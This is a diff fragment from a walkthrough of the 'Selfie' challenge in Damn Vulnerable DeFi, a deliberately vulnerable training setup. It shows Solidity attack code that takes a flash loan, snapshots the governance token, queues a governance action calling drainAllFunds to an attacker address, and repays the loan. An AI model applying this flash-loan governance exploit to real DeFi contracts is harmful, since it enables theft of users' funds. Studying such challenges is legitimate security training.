0xNazgul/Damn-Vulnerable-DeFi-Walkthrough/06Selfie.md

         pool.flashLoan(flashLoanBalance);
     }

-    // called by ISelfiePool::flashLoan
     function receiveTokens(address, uint256 amount) external {
-        // received tokens => take a snapshot because it's checked in queueAction token.snapshot();

-        // we can now queue a government action to drain all funds to attacker account
+        token.snapshot();

-        // because it checks the balance of governance tokens (which is the same token as the pool token) bytes memory drainAllFundsPayload =
+        bytes memory drainAllFundsPayload =
             abi.encodeWithSignature("drainAllFunds(address)", attackerEOA);
-        // store actionId so we can later execute it actionId = governance.queueAction(
+        actionId = governance.queueAction(
             address(pool),
             drainAllFundsPayload,
             0
         );

-        // pay back to flash loan sender token.transfer(address(pool), amount);
+        token.transfer(address(pool), amount);
     }
 }